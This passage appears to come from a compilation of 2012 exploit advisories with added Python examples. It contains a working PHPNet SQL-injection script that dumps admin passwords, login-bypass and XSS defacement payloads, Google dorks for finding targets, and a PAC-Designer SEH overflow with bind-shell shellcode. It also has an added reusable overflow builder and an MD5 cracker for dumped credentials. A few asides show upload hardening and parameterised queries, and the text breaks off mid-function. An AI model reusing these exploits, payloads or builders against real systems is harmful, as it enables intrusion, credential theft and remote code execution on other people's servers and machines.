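# One dot only: "shell.php.png" and names with odd characters fail here.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def stored_name_vulnerable(client_filename: str) -> str:
    """The pattern behind the three advisories: the client's filename is
    kept (at best basename'd), so backdoor.php / lo.php land in a
    web-served directory and execute when requested."""
    return os.path.basename(client_filename)


def upload_verdict(client_filename: str, content: bytes) -> tuple:
    """Return (accepted, reason_or_stored_name). Both the filename and the
    Content-Type the client sends are untrusted; only the bytes count."""
    name = os.path.basename(client_filename)
    m = SAFE_NAME.fullmatch(name)
    if not m:
        return False, "filename rejected (one extension, plain characters only)"
    ext = m.group(1).lower()
    if ext not in IMAGE_MAGIC:
        return False, f"extension .{ext} is not on the image allow-list"
    if not any(content.startswith(magic) for magic in IMAGE_MAGIC[ext]):
        return False, f"content does not look like a .{ext} file"
    # The server picks the stored name; the client's name only chose the type.
    return True, f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    samples = [  # constructed uploads
        ("backdoor.php", b"<?php system($_GET['cmd']); ?>"),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
        ("letterhead.png", b"<?php phpinfo(); ?>"),
        ("letterhead.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for fname, body in samples:
        print(f"{fname:16} vulnerable-> {stored_name_vulnerable(fname):16} hardened-> {upload_verdict(fname, body)}")
```

    The magic check is a cheap filter, not proof: "GIF89a<?php ... ?>" passes it. The parts that actually stop code execution are the extension allow-list, the server-chosen filename, and keeping the upload directory non-executable or outside the web root; the PoCs above work precisely because the uploaded name and extension reach a directory PHP serves.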

  14. PHPNet <= 1.8 (ler.php) SQL Injection

    <?php
    # Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection
    # Exploit Author: WhiteCollarGroup
    # Date: 06th 06 2012
    # Vendor homepage: http://www.phpnet.com.br/
    # Software Link: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos
    # Google Dork: intext:"Powerd by Nielson Rocha"
    # Google Dork: inurl:"ler.php?id=" intext:"Voltar - Imprimir"
    # Version: 1.8
    # Tested on: Debian GNU/Linux,Windows 7 Ultimate

    /*
    We discovered multiple vulnerabilities on the system.

    ~> SQL Injection
    This exploit is for a vulnerability in ler.php, but the same vulnerability exists in imprimir.php and imagem.php.
    ler.php?id=[SQLi]
    imprimir.php?id=[SQLi]
    imagem.php?id=[SQLi]

    Usage:
    php file.php http://server/path/

    ~> Login bypass
    On the login page, you can bypass the login using "SQLi strings".
    Go to http://server/path/admin/login.php

    Login: ' or 1=1-- wc
    Pass: wcgroup

    ~> Arbitrary File Upload
    After opening the administration panel, try to add a new article.
    Use the upload form to upload your webshell.
    After posting, access:
    http://server/path/tmp/your_shell_filename.php

    ~> Information disclosure
    Access:
    http://server/path/conf/config.ini

    ~> XSS Stored (persistent)
    When posting a new article, you can post (D)HTML/Javascript code on the page.

    */

    function _printf($str) {
        echo $str."\n";
    }

    // Encode a string as a MySQL hex literal (0x...) so it needs no quotes inside the injected query.
    function hex($string){
        $hex=''; // PHP 'Dim' =]
        for ($i=0; $i < strlen($string); $i++){
            $hex .= sprintf('%02x', ord($string[$i])); // two digits per byte keeps the literal byte-aligned
        }
        return '0x'.$hex;
    }

    set_time_limit(0);
    error_reporting(E_ERROR & E_USER_WARNING);
    @ini_set('default_socket_timeout', 30);
    echo "\n";

    echo "PHPNet <= 1.8 SQLi Exploit\n";
    echo "Discovered by WhiteCollarGroup\n";
    echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com";
    if($argc!=2) {
        _printf("Usage:");
        _printf("php $argv[0] <target>");
        _printf("Example:");
        _printf("php $argv[0] http://site.com/path/");
        exit;
    }

    $target = $argv[1];
    if(substr($target, (strlen($target)-1))!="/") { // if the last character is not a slash
        $target .= "/";
    }

    $inject = $target . "ler.php?id=-0'%20";

    // Random marker wrapped around the injected columns so they can be picked out of the HTML.
    $token = uniqid();
    $token_hex = hex($token);

    // First fetch version() and user()
    echo "\n\n[*] Trying to get information...\n";

    $infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- "));
    $infos_r = array();
    preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);
    // concat() puts version() first and user() second
    $version = $infos_r[1][0];
    $user = $infos_r[2][0];
    if(($user) AND ($version))
    {
        echo "[!] MySQL user: $user\n";
        echo "[!] MySQL version: $version\n";
    }
    else
    {
        echo "[-] Error while getting information...\n";
    }

    // Then dump admin_user/admin_pass from pna_admin one row at a time
    $i = 0;
    while(1==1) {
        $dados_r = array();
        $dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- "));
        preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r);
        $login = $dados_r[1][0];
        $senha = $dados_r[2][0];
        if(($login) AND ($senha)) {
            echo " -+-\n";
            echo "[!] User: $login\n";
            echo "[!] Pass: $senha\n";
            $i++;
        } else {
            break; // no more rows
        }
    }

    // Print the summary once the loop has finished.
    if($i==0) {
        echo "[-] Exploit failed. Make sure that the server is running a vulnerable version of PHPNet without mod_security. We're sorry.";
    } else {
        echo " -+-\n[!] :D";
    }
    echo "\n";

    ?>

    Source: PHPNet <= 1.8 (ler.php) SQL Injection

  15. SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection

    ##############################################################################
    ## SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability
    ## Google Dork: "snews/visualiza.php?id="
    ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
    ## Date: 06/06/2012
    ## Version: 1.2
    ## Software Link: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
    ## ISRAEL
    ##############################################################################
    ## Author will be not responsible for any damage.
    ##############################################################################
    ## Vulnerable Code - /admin/logar.php [4-15]:
    4.  $login = $_POST["login"];
    5.  $senha = $_POST["senha"];
    6.  $sql = "select * from news_adm where login='$login' AND senha='$senha'";
    7.  $query = mysql_query($sql);
    8.  $nr = mysql_num_rows($query);
    9.  if($nr>0){
    10.     $_SESSION["admin"] = "on";
    11.     echo "<script>
    12.     location.href='../'
    13.     </script>
    14.     ";
    15. }
    ## NOTE:
    ## As you can see there is no validation or any filter to variables $login and $senha.
    ## See line 6, so you can inject sql query by using $login and $senha variables.
    ## SQL Injection PoC:
    ## http://127.0.0.1/sn_news/admin/login.htm
    ## Login: ' or '1'='1
    ## Senha: ' or '1'='1
    ## This injection will bypass the admin login screen.
    ##############################################################################
    # Cya
    # 0x31337.net
    ##############################################################################

    Source: SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection
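    Added example, not code from SN News, PHPNet or phpAccounts: the login query shown at line 6 of logar.php above, modelled in Python on an in-memory SQLite table, beside the parameterised form, and run against the bypass strings quoted in the SN News, PHPNet and phpAccounts posts. The table, the admin row and the password are constructed. SQLite has no `#` line comment, so the phpAccounts payload is shown with `-- ` in place of the MySQL-only `#`.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the news_adm table (one admin row)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news_adm (login TEXT, senha TEXT)")
    con.execute("INSERT INTO news_adm VALUES ('admin', 'constructed-pass')")
    return con


def login_vulnerable(con: sqlite3.Connection, login: str, senha: str) -> bool:
    """Same shape as logar.php line 6: the untrusted strings are spliced
    into the SQL text, so a quote in either field rewrites the WHERE clause."""
    sql = f"select * from news_adm where login='{login}' AND senha='{senha}'"
    return len(con.execute(sql).fetchall()) > 0


def login_fixed(con: sqlite3.Connection, login: str, senha: str) -> bool:
    """Parameterised: the values never become part of the SQL text."""
    sql = "select * from news_adm where login=? AND senha=?"
    return len(con.execute(sql, (login, senha)).fetchall()) > 0


# (login, senha) pairs quoted in the advisories above.
BYPASS_PAYLOADS = [
    ("' or '1'='1", "' or '1'='1"),    # SN News: both fields
    ("' or 1=1-- wc", "wcgroup"),       # PHPNet: comment out the rest of the clause
    ("x' or '1'='1'-- ", "anything"),   # phpAccounts, with '#' replaced by '-- '
]


def run_payloads(con: sqlite3.Connection, login_fn) -> dict:
    """Map each payload's login string to whether login_fn let it in;
    a SQL syntax error counts as a failed bypass."""
    results = {}
    for user, pw in BYPASS_PAYLOADS:
        try:
            results[user] = login_fn(con, user, pw)
        except sqlite3.Error:
            results[user] = False
    return results


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", run_payloads(db, login_vulnerable))
    print("fixed:     ", run_payloads(db, login_fixed))
```

    The SN News payload works without a comment because `AND` binds tighter than `OR`: the clause becomes `login='' OR ('1'='1' AND senha='') OR '1'='1'`, which is always true. The parameterised version still authenticates the real credentials and treats every payload as a literal string that matches no row.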

  16. Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit

    #!/usr/bin/python

    #------------------------------------------------------------------------------------#
    # Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions) #
    # CVE: CVE-2012-2915 #
    # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/ #
    # OS: WinXP SP1 #
    # Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
    #------------------------------------------------------------------------------------#
    # I didn't dig to deep but it seems portability to other OS builds is not promising #
    # due to SafeSEH and badchars in the application modules. #
    #------------------------------------------------------------------------------------#
    # root@bt:~# nc -nv 192.168.111.130 9988 #
    # (UNKNOWN) [192.168.111.130] 9988 (?) open #
    # Microsoft Windows XP [Version 5.1.2600] #
    # (C) Copyright 1985-2001 Microsoft Corp. #
    # #
    # C:\Documents and Settings\Owner\Desktop> #
    #------------------------------------------------------------------------------------#

    filename="evil.PAC"

    PAC1 = """<?xml version="1.0"?>

    <PacDesignData>

    <DocFmtVersion>1</DocFmtVersion>
    <DeviceType>ispPAC-CLK5410D</DeviceType>

    <CreatedBy>PAC-Designer 6.21.1336</CreatedBy>

    <SummaryInformation>
    <Title>Oops..</Title>
    <Author>b33f</Author>
    </SummaryInformation>

    <SymbolicSchematicData>
    <Symbol>
    <SymKey>153</SymKey>
    <NameText>Profile 0 Ref Frequency</NameText>
    <Value>"""

    #------------------------------------------------------------------------------------#
    # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #
    # [*] x86/alpha_mixed succeeded with size 744 (iteration=1) #
    #------------------------------------------------------------------------------------#
    shellcode = (
    "\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
    "\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
    "\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
    "\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
    "\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
    "\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
    "\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
    "\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
    "\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
    "\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
    "\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
    "\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
    "\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
    "\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
    "\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
    "\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
    "\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
    "\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
    "\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
    "\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
    "\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
    "\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
    "\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
    "\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
    "\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
    "\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
    "\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
    "\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
    "\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
    "\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
    "\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
    "\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
    "\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
    "\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
    "\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
    "\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
    "\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
    "\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
    "\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
    "\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
    "\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
    "\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
    "\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"
    "\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
    "\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
    "\x70\x30\x53\x79\x6f\x68\x55\x41\x41")

    #------------------------------------------------------------------------------------#
    # SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll #
    # nSEH: \xEB\x05 #
    #------------------------------------------------------------------------------------#
    b00m = "\x90"*20 + shellcode
    payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))

    PAC2 = """</Value>
    </Symbol>
    </SymbolicSchematicData>

    </PacDesignData>"""

    buffer = PAC1 + payload + PAC2

    textfile = open(filename , 'w')
    textfile.write(buffer)
    textfile.close()

    Source: Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
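    Added example, not part of b33f's PoC: the SEH record and buffer layout the PoC hard-codes, as a reusable builder with a bad-character check, in the same language as the PoC. It reproduces the PoC's six record bytes exactly for the SHELL32 pop/pop/ret address it uses; the function names, the total-length parameter and the placeholder shellcode are mine, and the XML wrapper repeats the fields the PoC's own template uses.

```python
import struct

JMP_SHORT_OVER_SEH = b"\xeb\x05"   # jmp +5: hops over the 4-byte handler slot into the NOP sled


def bad_bytes(data: bytes, badchars: bytes = b"\x00") -> list:
    """Offsets of bytes the target cannot accept (NUL by default)."""
    return [i for i, b in enumerate(data) if b in badchars]


def seh_record(pp_ret_addr: int, badchars: bytes = b"\x00") -> bytes:
    """nSEH + SEH as they must appear in the file: a 2-byte short jump, then
    the pop/pop/ret address packed little-endian. Refuses an address whose
    packed form contains a bad byte, since that would truncate the string."""
    packed = struct.pack("<I", pp_ret_addr)
    if bad_bytes(packed, badchars):
        raise ValueError(f"{pp_ret_addr:#010x} packs to {packed!r}, which contains a bad byte")
    return JMP_SHORT_OVER_SEH + packed


def address_is_usable(pp_ret_addr: int, badchars: bytes = b"\x00") -> bool:
    try:
        seh_record(pp_ret_addr, badchars)
        return True
    except ValueError:
        return False


def build_overflow(offset: int, pp_ret_addr: int, shellcode: bytes,
                   total_len: int, nops: int = 20,
                   filler: bytes = b"A", tail: bytes = b"C") -> bytes:
    """filler*offset | nSEH | SEH | NOP sled | shellcode | tail padding.
    `offset` is the distance to the handler record (98 in the PoC); the tail
    pushes the buffer far enough past it for the exception to be raised."""
    body = filler * offset + seh_record(pp_ret_addr) + b"\x90" * nops + shellcode
    if len(body) > total_len:
        raise ValueError("shellcode does not fit inside total_len")
    if bad_bytes(shellcode, b"\x00<>&"):
        raise ValueError("shellcode contains a byte that breaks the XML or the string copy")
    return body + tail * (total_len - len(body))


def wrap_pac(payload: bytes) -> bytes:
    """Embed the buffer in the <Value> element, as the PoC does."""
    head = (b'<?xml version="1.0"?>\n<PacDesignData>\n<DocFmtVersion>1</DocFmtVersion>\n'
            b'<DeviceType>ispPAC-CLK5410D</DeviceType>\n<SymbolicSchematicData>\n<Symbol>\n'
            b'<SymKey>153</SymKey>\n<NameText>Profile 0 Ref Frequency</NameText>\n<Value>')
    tail = b'</Value>\n</Symbol>\n</SymbolicSchematicData>\n</PacDesignData>'
    return head + payload + tail


if __name__ == "__main__":
    # Placeholder shellcode (int3 x 16); substitute an alphanumeric-encoded payload.
    buf = build_overflow(98, 0x77512879, b"\xcc" * 16, 5000)
    print("record at offset 98:", buf[98:104].hex())
    with open("evil.PAC", "wb") as f:
        f.write(wrap_pac(buf))
```

    The bad-byte check on the address is the part worth keeping: the PoC's note that SafeSEH and module bad characters limit portability is exactly the situation where a candidate pop/pop/ret address packs to something the file parser will not carry intact, and an alphanumeric-encoded payload (as the PoC's msfencode line produces) is what keeps the shellcode clear of `<`, `>` and `&` inside the XML value.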

  17. Browser Navigation Download Trick

    Another moderately interesting tidbit, I guess...

    It is an important and little-known property of web browsers that one
    document can always navigate other, non-same-origin windows to
    arbitrary URLs. Perhaps more interestingly, you can also navigate
    third-party documents to resources served with Content-Disposition:
    attachment, in which case, you get the original contents of the
    address bar, plus a rogue download prompt attached to an unsuspecting
    page that never wanted you to download that file.

    PoC:
    http://lcamtuf.coredump.cx/fldl/

    ==========
    <input type=submit onclick="doit()" value="Click me. I like to be clicked.">
    <script>
    var w;
    var once;

    function doit() {

      if (navigator.userAgent.indexOf('MSIE') != -1)
        w = window.open('page2.html', 'foo');
      else
        w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo');

      setTimeout(donext, 4500);

    }

    function donext() {
      window.open('http://199.58.85.40/download2.cgi', 'foo');
      if (once != true) setTimeout(donext, 5000);
      once = true;
    }
    </script>
    ==========


    More info:
    http://lcamtuf.blogspot.com/2012/05/yes-you-can-have-fun-with-downloads.html

    It's closely related to many other fundamental, open issues with
    browser UI design - but I guess it's an interesting highlight.

    /mz

    Source: Browser Navigation Download Trick

  18. Ganesha Digital Library 4.0 Multiple Vulnerabilities

    =====================================================
    Ganesha Digital Library 4.0 Multiple Vulnerabilities
    =====================================================

    :----------------------------------------------------------------------------------------------------------------------------------------:
    : # Exploit Title : Ganesha Digital Library 4.0 Multiple Vulnerabilities
    : # Date : 30 May 2012
    : # Author : X-Cisadane
    : # Software Link : kmrg.itb.ac.id
    : # Version : 4.x
    : # Category : Web Applications
    : # Vulnerability : SQL Injection Vulnerability & NON-Persistent XSS Vulnerability
    : # Tested On : Mozilla Firefox 7.0.1 (Windows)
    : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
    :----------------------------------------------------------------------------------------------------------------------------------------:

    Description :
    =============
    Ganesha Digital Library (GDL) is a digital library software developed by
    Knowledge Management Research Group (KMRG) Institute of Technology Bandung
    (ITB) in order to harness the intellectual capital (intellectual capital)
    of ITB, which includes academic articles, journals, the final task, thesis,
    dissertation, research results, expertise and other directory.

    Dorks :
    =======
    inurl:"/office.php?m="
    intext:Copyright © 2002-2003 - KMRG ITB. All rights reserved
    intext:This work was carried out with the aid of a grant from YLTI Indonesia and IDRC Canada.
    intitle:" - GDL 4.0"

    POC :
    =====
    [1] NON-Persistent XSS in the Account Activation Section
    There is a security flaw (NON-Persistent XSS) in the Account Activation
    Section.
    Activate Account in the left corner Menu. Then you'll be taken to Activate
    Account Page, Fill this script : '"><script>alert(1337)</script> on the
    Account Field and Code Field Then Click Activate.

    [2] NON-Persistent XSS in the Search Section
    XSS Script : '"><script>alert(1337)</script>
    For Example :
    http://server/pustaka/search.php?s=[Insert XSS Script]

    [3] NON-Persistent XSS in /office.php?m=lang&langid=[Insert XSS Script]
    XSS Script : '"><script>alert(1337)</script>
    For Example :
    Type XSS Script like this --->
    http://server/office.php?m=lang&langid='"><script>alert(1337)</script>
    AND PRESS ENTER!
    Then you'll be taken to Error Page.
    Then edit the URL like this --->
    http://server/office.php?m=lang&langid=en AND PRESS
    ENTER!
    If it is successful, a message box "1337" will appear.
    P.S : Login Required!

    [4] NON-Persistent XSS DEFACING
    XSS Script : http://server/publisher.php?id=<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni, Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit http://xcode.or.id";</script>

    [5] SQL Injection on The Login Form (Gain SuperUser Access!)
    Open Ganesha Digital Library 4.0 Login Page
    For the example : Open http://server/login.php
    On the Account Field, Fill with this Symbol : '=0#
    On the Password Field Don't Fill Anything!!! Then Click Login Button.
    If it is successful, you will get superuser GDL access!
    You can try another site such as :
    http://server/login.php


    [6] SQL Injection on go.php?id=['SQL]
    SQL Injection on go.php?id=ID BLA BLA BLA&node=['SQL]
    SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA
    BLA&start=['SQL]
    SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA
    BLA&start=START ID BLA BLA BLA&node=['SQL]
    For Example :
    http://server/go.php?id='jkpkbppk-gdl-grey-2011-santoso-3848
    http://server/go.php?id='dlhub-gdl-s1-2012-dewantiarl-23785
    http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node='781&start=81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
    http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start='81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
    http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start=81&PHPSESSID=%27a46159e2d84c6d5fab6e581f7d3e7f3a

    [7] SQL Injection on publisher.php?id=['SQL]
    For Example :
    http://server/publisher.php?id=%27JBPEDONFAU

    [8] SQL Injection on go.php?node=['SQL]
    For Example :
    http://server/go.php?node='191

    P.S : Login Required!

    [9] SQL Injection on office.php?m=explorer&a=['SQL]&b=expand&w=0
    For Example :
    http://server/office.php?m=explorer&a='191&b=expand&w=0

    P.S : Login Required!

    [10] SQL Injection on office.php?m=user&a=['SQL]
    For Example :
    http://server/office.php?m=user&a='pdsony@idola.net.id&b=edit
    P.S : Login Required!

    [11] SQL Injection on office.php?m=workgroup&a=['SQL]&b=edit
    For Example :
    http://server/office.php?m=workgroup&a='1&b=edit
    P.S : Login Required!

    [12] SQL Injection on office.php?m=user&so=desc&sb=['SQL]
    For Example :
    http://server/office.php?m=user&so=desc&sb='FULL_NAME
    http://server/office.php?m=user&so=asc&sb='EMAIL
    http://server/office.php?m=user&so=asc&sb='GID
    http://server/office.php?m=user&so=asc&sb='CONFIRM
    P.S : Login Required!

    Source: Ganesha Digital Library 4.0 Multiple Vulnerabilities

  19. NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities

    # Exploit Title: NewsAdd <=1.0 Multiple SQL Injection
    # Google Dork: -----------------------------------
    # Date: 2012/05/29
    # Author: WhiteCollarGroup
    # Software Link: http://phpbrasil.com/script/3tCyUs1JeL1M/newsadd--mysql
    # Version: 1.0
    # Tested on: Debian GNU/Linux

    Developer URL: http://tvaini.ueuo.com/
    Vulnerabilities discovered by WhiteCollarGroup
    www.wcgroup.host56.com
    whitecollar_group@hotmail.com

    If you install NewsAdd on your system for testing, note that some servers have problems with the tabs in the schema.
    Therefore, replace the second query:
    --- begin ---
    CREATE TABLE IF NOT EXISTS 'comentario' (
    'id' int(11) NOT NULL AUTO_INCREMENT,
    'id_noticia' int(11) NOT NULL,
    'usuario' varchar(15) NOT NULL,
    'comentario' text NOT NULL,
    'data' datetime NOT NULL,
    PRIMARY_KEY('id')
    ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=15 ;
    --- end ---
    By this:
    --- begin ---
    DROP TABLE IF EXISTS `comentario`;
    CREATE TABLE `comentario` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `id_noticia` int(11) NOT NULL,
    `usuario` varchar(15) NOT NULL,
    `comentario` text NOT NULL,
    `data` datetime NOT NULL,
    PRIMARY KEY (`id`)
    ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
    --- end ---

    We discovered five SQL Injection vulnerabilities on public access.
    _
    |_| Vulnerabilities before login

    /
    | SQL Injection on the search form
    \
    The first vulnerability is in the search form, on index. Paste this in it:
    %' UNION ALL SELECT 1,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),3,4,5 from usuarios-- wc
    You will get a unique line like:

    admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0,user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0

    Lines are separated by commas (",") and columns, by "<=>".
    In the return, we have two lines:

    admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0
    user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0

    Here, we have the columns as follow:
    email <=> username <=> md5(password) <=> admin? <=> banned?

    /
    | SQL Injection on comments
    \

    For this, you must be a user. Register on the "cadastro.php" form.
    After, access:
    http://domain/comentar.php?id=-0' union all select 1,2,3,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+
    You will view a line like the previous example.


    _
    |_| Vulnerabilities after login

    /
    | Delete all posts
    \

    /admin/removerNoticia.php?id=0' or '1'='1&conf=sim


    /
    | Ban all users
    \

    /admin/listarUsuarios.php?acao=banir&id=0' or '1'='1


    /
    | Delete all users
    \

    /admin/removerUsuario.php?id=0' or '1'='1&conf=sim

    Note that if you delete all users, you will lose access to the system.

    Source: NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities
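    Added example, not from the NewsAdd advisory: a parser for the single line the search-form and comentar.php UNION payloads hand back, plus a small wordlist check against the md5 column, in Python. The `0x3c3d3e` in the payload is the hex encoding of the `<=>` column separator, and `,` is group_concat()'s default row separator; the sample line is the one quoted in the advisory and the wordlist is constructed.

```python
import hashlib

COL_SEP = bytes.fromhex("3c3d3e").decode()   # the 0x3c3d3e in the payload is "<=>"
ROW_SEP = ","                                # group_concat() default separator
COLUMNS = ("email", "username", "md5_password", "is_admin", "is_banned")


def parse_group_concat(blob: str) -> list:
    """Split the single group_concat() line into one dict per usuarios row."""
    rows = []
    for record in blob.strip().split(ROW_SEP):
        parts = record.split(COL_SEP)
        if len(parts) != len(COLUMNS):
            raise ValueError(f"unexpected record shape: {record!r}")
        rows.append(dict(zip(COLUMNS, parts)))
    return rows


def crack_md5(hexdigest: str, wordlist) -> "str | None":
    """Return the first wordlist entry whose unsalted MD5 matches, else None."""
    target = hexdigest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


# The output line quoted in the advisory, and a constructed mini wordlist.
SAMPLE = ("admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0,"
          "user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0")
WORDLIST = ["password", "123456", "admin", "user", "letmein"]


def recover_accounts(blob: str = SAMPLE, wordlist=WORDLIST) -> list:
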